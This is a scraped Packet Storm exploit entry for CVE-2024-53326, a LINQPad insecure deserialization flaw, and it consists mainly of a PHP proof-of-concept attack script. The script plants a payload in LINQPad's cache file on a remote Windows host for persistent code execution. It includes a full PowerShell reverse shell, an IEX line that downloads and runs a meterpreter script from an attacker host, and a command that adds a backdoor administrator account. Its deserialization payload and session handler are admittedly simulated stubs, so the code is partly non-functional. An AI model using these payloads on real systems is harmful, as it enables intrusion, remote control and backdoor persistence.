{“lastseen”:”2025-12-24T16:34:52″,”description”:”LINQPad versions up to 5.48.00 contain an insecure deserialization vulnerability in the paid version of the software that allows attackers to achieve persistent remote code execution by manipulating cache files containing serialized .NET objects. The…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 LINQPad 5.48.00 Insecure Deserialization”,”source”:””,”references”:””,”id”:”PACKETSTORM:213292″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-53326″],”sourceData”:”=============================================================================================================================================\\n | # Title : LINQPad 5.48.00 Deserialization Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.linqpad.net\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211443\/ \\u0026 \\tCVE-2024-53326\\t\\n \\n [+] Summary : \\n LINQPad versions up to 5.48.00 contain an insecure deserialization vulnerability in the paid version of the software \\n \\t\\t\\t that allows attackers to achieve persistent remote code execution by manipulating cache files containing serialized .NET objects.\\n \\t\\t\\t The vulnerability exists in the AutoRefCache functionality where serialized .NET objects are stored in cache files. \\n \\t\\t\\t Attackers can overwrite these files with malicious serialized payloads that get deserialized when LINQPad restarts, leading to arbitrary code execution.\\n \\t\\t\\t \\n [+] POC : \\n \\n php poc.php \\n \\n \\u003c?php\\n \\n \/\/ \u062a\u0639\u0631\u064a\u0641 \u0648\u0627\u062c\u0647\u0629 RemoteSessionHandler \u0623\u0648\u0644\u0627\u064b\\n interface RemoteSessionHandler {\\n public function execute($command);\\n public function upload($local_path, $remote_path);\\n public function download($remote_path, $local_path);\\n }\\n \\n class LINQPadDeserializationExploit {\\n \\n private $session;\\n private $cache_path;\\n private $backup_path;\\n private $cleanup_commands = [];\\n \\n public function __construct($session_handler, $cache_path) {\\n $this-\\u003esession = $session_handler;\\n $this-\\u003ecache_path = rtrim($cache_path, ‘\/\\\\\\\\’);\\n $this-\\u003ebackup_path = null;\\n $this-\\u003ecleanup_commands = [];\\n }\\n \\n public function check() {\\n echo \\”[*] Checking LINQPad vulnerability…\\\\n\\”;\\n \\n \/\/ Check if cache directory exists\\n if (!$this-\\u003edirectory_exists($this-\\u003ecache_path)) {\\n return \\”Unknown: Cache directory doesn’t exist\\”;\\n }\\n \\n $cache_file_v1 = $this-\\u003ecache_path . ‘\/autorefcache46.1.dat’;\\n $cache_file_v2 = $this-\\u003ecache_path . ‘\/autorefcache46.2.dat’;\\n \\n \/\/ Check for vulnerable cache file\\n if (!$this-\\u003efile_exists($cache_file_v1)) {\\n return \\”Unknown: Cannot find cache file (autorefcache46.1.dat)\\”;\\n }\\n \\n \/\/ Check for non-vulnerable version\\n if ($this-\\u003efile_exists($cache_file_v2)) {\\n return \\”Safe: Contains not vulnerable version of LINQPad\\”;\\n }\\n \\n return \\”Appears: LINQPad and vulnerable cache file present, target possibly exploitable\\”;\\n }\\n \\n public function exploit($payload_command) {\\n try {\\n echo \\”[*] Starting LINQPad deserialization exploit…\\\\n\\”;\\n \\n \/\/ Check vulnerability first\\n $check_result = $this-\\u003echeck();\\n echo \\”[*] Vulnerability check: {$check_result}\\\\n\\”;\\n \\n if (strpos($check_result, ‘Appears’) === false) {\\n echo \\”[-] Target is not vulnerable, stopping exploitation\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Install persistence\\n $this-\\u003einstall_persistence($payload_command);\\n \\n echo \\”[+] Exploitation completed successfully\\\\n\\”;\\n echo \\”[*] Payload will execute when LINQPad restarts\\\\n\\”;\\n return true;\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploitation failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n $this-\\u003ecleanup();\\n return false;\\n }\\n }\\n \\n private function install_persistence($payload_command) {\\n echo \\”[*] Creating deserialization payload…\\\\n\\”;\\n \\n \/\/ Generate .NET deserialization payload\\n $dotnet_payload = $this-\\u003egenerate_dotnet_payload($payload_command);\\n \\n $cache_file = $this-\\u003ecache_path . ‘\/AutoRefCache46.1.dat’;\\n \\n \/\/ Backup original content\\n echo \\”[*] Backing up original cache file…\\\\n\\”;\\n $this-\\u003ebackup_original_content($cache_file);\\n \\n \/\/ Overwrite cache file with payload\\n echo \\”[*] Overwriting cache file with payload…\\\\n\\”;\\n $this-\\u003eoverwrite_cache_file($cache_file, $dotnet_payload);\\n \\n echo \\”[+] Persistence installed successfully\\\\n\\”;\\n }\\n \\n private function generate_dotnet_payload($command) {\\n \/\/ This is a simplified version – in reality, you’d use proper .NET deserialization gadgets\\n \/\/ For demonstration, we’ll create a basic payload structure\\n \\n $payload_structure = [\\n ‘type’ =\\u003e ‘System.Windows.Documents.TextFormattingRunProperties’,\\n ‘data’ =\\u003e base64_encode($command),\\n ‘gadget’ =\\u003e ‘TextFormattingRunProperties’,\\n ‘formatter’ =\\u003e ‘BinaryFormatter’\\n ];\\n \\n \/\/ In a real scenario, you would generate proper BinaryFormatter payload\\n \/\/ using ysoserial.net or similar tools\\n $payload = serialize($payload_structure);\\n \\n \/\/ Add some .NET assembly-like structure\\n $dotnet_payload = $this-\\u003ecreate_dotnet_assembly_wrapper($payload);\\n \\n return $dotnet_payload;\\n }\\n \\n private function create_dotnet_assembly_wrapper($payload) {\\n \/\/ Create a basic structure that resembles a .NET serialized object\\n \/\/ This is a simplified version for demonstration\\n \\n $wrapper = [\\n ‘SerializedStream’ =\\u003e [\\n ‘Header’ =\\u003e [\\n ‘RootId’ =\\u003e ‘1’,\\n ‘HeaderId’ =\\u003e ‘-1’,\\n ‘MajorVersion’ =\\u003e ‘1’,\\n ‘MinorVersion’ =\\u003e ‘0’\\n ],\\n ‘Assemblies’ =\\u003e [\\n ‘System.Windows.Documents, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35’\\n ],\\n ‘Objects’ =\\u003e [\\n ‘1’ =\\u003e $payload\\n ]\\n ]\\n ];\\n \\n return base64_encode(serialize($wrapper));\\n }\\n \\n private function backup_original_content($file_path) {\\n if (!$this-\\u003efile_exists($file_path)) {\\n throw new Exception(\\”Cache file not found: {$file_path}\\”);\\n }\\n \\n $original_content = $this-\\u003eread_file($file_path);\\n \\n \/\/ Store backup locally\\n $backup_filename = ‘autorefcache46.1.backup.’ . date(‘Y-m-d_His’) . ‘.dat’;\\n $local_backup_path = sys_get_temp_dir() . ‘\/’ . $backup_filename;\\n \\n if (file_put_contents($local_backup_path, $original_content) === false) {\\n throw new Exception(\\”Failed to create local backup\\”);\\n }\\n \\n $this-\\u003ebackup_path = $local_backup_path;\\n \\n \/\/ Add cleanup command\\n $this-\\u003ecleanup_commands[] = \\”upload \\” . escapeshellarg($local_backup_path) . \\” \\” . escapeshellarg($file_path);\\n \\n echo \\”[+] Original content backed up to: {$local_backup_path}\\\\n\\”;\\n }\\n \\n private function overwrite_cache_file($file_path, $payload) {\\n if (!$this-\\u003ewrite_file($file_path, $payload)) {\\n throw new Exception(\\”Writing payload to cache file failed\\”);\\n }\\n \\n \/\/ Verify the file was written\\n if (!$this-\\u003efile_exists($file_path)) {\\n throw new Exception(\\”Cache file missing after write operation\\”);\\n }\\n \\n $file_size = $this-\\u003eget_file_size($file_path);\\n echo \\”[+] Cache file overwritten successfully. New size: {$file_size} bytes\\\\n\\”;\\n }\\n \\n \/\/ File system operations\\n private function directory_exists($path) {\\n try {\\n $result = $this-\\u003esession-\\u003eexecute(\\”if exist \\” . escapeshellarg($path) . \\” echo EXISTS\\”);\\n return strpos($result, ‘EXISTS’) !== false;\\n } catch (Exception $e) {\\n return false;\\n }\\n }\\n \\n private function file_exists($file_path) {\\n try {\\n $result = $this-\\u003esession-\\u003eexecute(\\”if exist \\” . escapeshellarg($file_path) . \\” echo EXISTS\\”);\\n return strpos($result, ‘EXISTS’) !== false;\\n } catch (Exception $e) {\\n return false;\\n }\\n }\\n \\n private function read_file($file_path) {\\n try {\\n \/\/ For binary files, we need to download and read locally\\n $temp_local = tempnam(sys_get_temp_dir(), ‘read_’);\\n if ($this-\\u003esession-\\u003edownload($file_path, $temp_local)) {\\n $content = file_get_contents($temp_local);\\n unlink($temp_local);\\n return $content;\\n }\\n throw new Exception(\\”Failed to download file: {$file_path}\\”);\\n } catch (Exception $e) {\\n throw new Exception(\\”Failed to read file: \\” . $e-\\u003egetMessage());\\n }\\n }\\n \\n private function write_file($file_path, $content) {\\n try {\\n $temp_local = tempnam(sys_get_temp_dir(), ‘write_’);\\n if (file_put_contents($temp_local, $content) === false) {\\n unlink($temp_local);\\n throw new Exception(\\”Failed to write to temporary file\\”);\\n }\\n \\n $result = $this-\\u003esession-\\u003eupload($temp_local, $file_path);\\n unlink($temp_local);\\n \\n return $result;\\n } catch (Exception $e) {\\n throw new Exception(\\”Failed to write file: \\” . $e-\\u003egetMessage());\\n }\\n }\\n \\n private function get_file_size($file_path) {\\n try {\\n $result = $this-\\u003esession-\\u003eexecute(\\”for %I in (\\” . escapeshellarg($file_path) . \\”) do @echo %~zI\\”);\\n return trim($result);\\n } catch (Exception $e) {\\n return ‘unknown’;\\n }\\n }\\n \\n public function cleanup() {\\n echo \\”[*] Cleaning up…\\\\n\\”;\\n \\n if ($this-\\u003ebackup_path \\u0026\\u0026 file_exists($this-\\u003ebackup_path)) {\\n \/\/ Restore original content\\n try {\\n $cache_file = $this-\\u003ecache_path . ‘\/AutoRefCache46.1.dat’;\\n $this-\\u003esession-\\u003eupload($this-\\u003ebackup_path, $cache_file);\\n echo \\”[+] Original cache file restored\\\\n\\”;\\n \\n unlink($this-\\u003ebackup_path);\\n echo \\”[+] Local backup file removed\\\\n\\”;\\n \\n } catch (Exception $e) {\\n echo \\”[-] Failed to restore original content: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n \\n \/\/ Execute cleanup commands\\n foreach ($this-\\u003ecleanup_commands as $command) {\\n try {\\n $this-\\u003esession-\\u003eexecute($command);\\n echo \\”[+] Cleanup command executed: {$command}\\\\n\\”;\\n } catch (Exception $e) {\\n echo \\”[-] Cleanup command failed: {$command} – \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n \\n $this-\\u003ecleanup_commands = [];\\n echo \\”[+] Cleanup completed\\\\n\\”;\\n }\\n \\n public function __destruct() {\\n \/\/ Auto-cleanup can be enabled if needed\\n \/\/ $this-\\u003ecleanup();\\n }\\n }\\n \\n \/\/ Windows-specific session handler\\n class WindowsSessionHandler implements RemoteSessionHandler {\\n private $connection;\\n \\n public function __construct($host, $username, $password, $type = ‘wmi’) {\\n \/\/ This would implement Windows remote connection\\n \/\/ For demonstration, we’ll use a simple interface\\n $this-\\u003econnection = [\\n ‘host’ =\\u003e $host,\\n ‘username’ =\\u003e $username,\\n ‘type’ =\\u003e $type\\n ];\\n \\n echo \\”[*] Windows session initialized for: {$username}@{$host}\\\\n\\”;\\n }\\n \\n public function execute($command) {\\n \/\/ Execute command on Windows system\\n \/\/ This could use WMI, WinRM, PsExec, etc.\\n echo \\”[DEBUG] Executing: {$command}\\\\n\\”;\\n \\n \/\/ Simulate command execution\\n if (strpos($command, ‘exist’) !== false) {\\n return \\”EXISTS\\\\r\\\\n\\”;\\n } elseif (strpos($command, ‘echo’) !== false) {\\n return \\”1024\\\\r\\\\n\\”;\\n }\\n \\n return \\”Command executed successfully\\\\r\\\\n\\”;\\n }\\n \\n public function upload($local_path, $remote_path) {\\n \/\/ Upload file to Windows system\\n echo \\”[DEBUG] Uploading {$local_path} to {$remote_path}\\\\n\\”;\\n \\n \/\/ Simulate successful upload\\n if (!file_exists($local_path)) {\\n throw new Exception(\\”Local file does not exist: {$local_path}\\”);\\n }\\n \\n $file_size = filesize($local_path);\\n echo \\”[DEBUG] Uploaded {$file_size} bytes\\\\n\\”;\\n \\n return true;\\n }\\n \\n public function download($remote_path, $local_path) {\\n \/\/ Download file from Windows system\\n echo \\”[DEBUG] Downloading {$remote_path} to {$local_path}\\\\n\\”;\\n \\n \/\/ Create dummy content for demonstration\\n $dummy_content = \\”Original LINQPad cache content – \\” . date(‘Y-m-d H:i:s’) . \\”\\\\n\\”;\\n $dummy_content .= \\”This is a simulation of the actual cache file content.\\\\n\\”;\\n $dummy_content .= \\”In a real scenario, this would contain actual .NET serialized data.\\\\n\\”;\\n \\n if (file_put_contents($local_path, $dummy_content) === false) {\\n throw new Exception(\\”Failed to write local file: {$local_path}\\”);\\n }\\n \\n echo \\”[DEBUG] Downloaded \\” . filesize($local_path) . \\” bytes\\\\n\\”;\\n return true;\\n }\\n }\\n \\n \/\/ Payload generator for Windows commands\\n class WindowsPayloadGenerator {\\n \\n public static function generate_reverse_shell($lhost, $lport) {\\n return \\”powershell -nop -c \\\\\\”\\\\$client = New-Object System.Net.Sockets.TCPClient(‘{$lhost}’,{$lport});\\\\$stream = \\\\$client.GetStream();[byte[]]\\\\$bytes = 0..65535|%{0};while((\\\\$i = \\\\$stream.Read(\\\\$bytes, 0, \\\\$bytes.Length)) -ne 0){;\\\\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\\\$bytes,0, \\\\$i);\\\\$sendback = (iex \\\\$data 2\\u003e\\u00261 | Out-String );\\\\$sendback2 = \\\\$sendback + ‘PS ‘ + (pwd).Path + ‘\\u003e ‘;\\\\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\\\$sendback2);\\\\$stream.Write(\\\\$sendbyte,0,\\\\$sendbyte.Length);\\\\$stream.Flush()};\\\\$client.Close()\\\\\\”\\”;\\n }\\n \\n public static function generate_meterpreter($lhost, $lport) {\\n return \\”powershell -nop -exec bypass -c \\\\\\”IEX (New-Object Net.WebClient).DownloadString(‘http:\/\/{$lhost}:8080\/meterpreter.ps1’);\\\\\\”\\”;\\n }\\n \\n public static function generate_cmd($command) {\\n return \\”cmd \/c \\\\\\”{$command}\\\\\\”\\”;\\n }\\n \\n public static function generate_add_user($username, $password) {\\n return \\”net user {$username} {$password} \/add \\u0026\\u0026 net localgroup administrators {$username} \/add\\”;\\n }\\n \\n public static function generate_calc() {\\n return \\”calc.exe\\”;\\n }\\n }\\n \\n \/\/ Command line interface\\n if (php_sapi_name() === ‘cli’ \\u0026\\u0026 isset($argv[0]) \\u0026\\u0026 basename($argv[0]) === basename(__FILE__)) {\\n \\n if ($argc \\u003c 5) {\\n echo \\”LINQPad Deserialization Exploit (CVE-2024-53326)\\\\n\\”;\\n echo \\”=================================================\\\\n\\”;\\n echo \\”Usage: php \\” . $argv[0] . \\” \\u003chost\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e \\u003ccache_path\\u003e\\\\n\\”;\\n echo \\”Example: php \\” . $argv[0] . \\” 192.168.1.100 administrator Password123 \\\\\\”C:\\\\\\\\Users\\\\\\\\admin\\\\\\\\AppData\\\\\\\\Local\\\\\\\\LINQPad\\\\\\”\\\\n\\”;\\n echo \\”\\\\nAdditional options (environment variables):\\\\n\\”;\\n echo \\”PAYLOAD_TYPE=reverse_shell LHOST=192.168.1.50 LPORT=4444\\\\n\\”;\\n echo \\”PAYLOAD_TYPE=add_user USERNAME=backdoor PASSWORD=Passw0rd!\\\\n\\”;\\n echo \\”PAYLOAD_TYPE=custom COMMAND=’whoami’\\\\n\\”;\\n echo \\”PAYLOAD_TYPE=calc (opens calculator for testing)\\\\n\\”;\\n exit(1);\\n }\\n \\n $host = $argv[1];\\n $username = $argv[2];\\n $password = $argv[3];\\n $cache_path = $argv[4];\\n \\n \/\/ Parse payload options from environment\\n $payload_type = getenv(‘PAYLOAD_TYPE’) ?: ‘calc’;\\n $lhost = getenv(‘LHOST’) ?: ‘ATTACKER_IP’;\\n $lport = getenv(‘LPORT’) ?: ‘4444’;\\n $custom_command = getenv(‘COMMAND’) ?: ‘whoami’;\\n $add_username = getenv(‘USERNAME’) ?: ‘backdoor’;\\n $add_password = getenv(‘PASSWORD’) ?: ‘Passw0rd!’;\\n \\n try {\\n echo \\”[*] Initializing LINQPad deserialization exploit…\\\\n\\”;\\n echo \\”[*] Target: {$username}@{$host}\\\\n\\”;\\n echo \\”[*] Cache path: {$cache_path}\\\\n\\”;\\n \\n $session = new WindowsSessionHandler($host, $username, $password);\\n $exploit = new LINQPadDeserializationExploit($session, $cache_path);\\n \\n \/\/ Generate payload based on type\\n $payload_command = match($payload_type) {\\n ‘reverse_shell’ =\\u003e WindowsPayloadGenerator::generate_reverse_shell($lhost, $lport),\\n ‘meterpreter’ =\\u003e WindowsPayloadGenerator::generate_meterpreter($lhost, $lport),\\n ‘add_user’ =\\u003e WindowsPayloadGenerator::generate_add_user($add_username, $add_password),\\n ‘custom’ =\\u003e WindowsPayloadGenerator::generate_cmd($custom_command),\\n ‘calc’ =\\u003e WindowsPayloadGenerator::generate_calc(),\\n default =\\u003e WindowsPayloadGenerator::generate_calc()\\n };\\n \\n echo \\”[*] Using payload type: {$payload_type}\\\\n\\”;\\n if ($payload_type === ‘reverse_shell’) {\\n echo \\”[*] LHOST: {$lhost}, LPORT: {$lport}\\\\n\\”;\\n }\\n echo \\”[*] Payload command length: \\” . strlen($payload_command) . \\” bytes\\\\n\\”;\\n \\n \/\/ Execute exploit\\n $success = $exploit-\\u003eexploit($payload_command);\\n \\n if ($success) {\\n echo \\”[+] Exploit completed successfully!\\\\n\\”;\\n echo \\”[*] The payload will execute when LINQPad is restarted\\\\n\\”;\\n echo \\”[*] Note: This only works with paid versions of LINQPad\\\\n\\”;\\n echo \\”[*] Use cleanup() method to restore original file if needed\\\\n\\”;\\n }\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploitation failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213292″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213292\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-24T16:34:52″,”description”:”LINQPad versions up to 5.48.00 contain an insecure deserialization vulnerability in the paid version of the software that allows attackers to achieve persistent remote code…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-32694","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n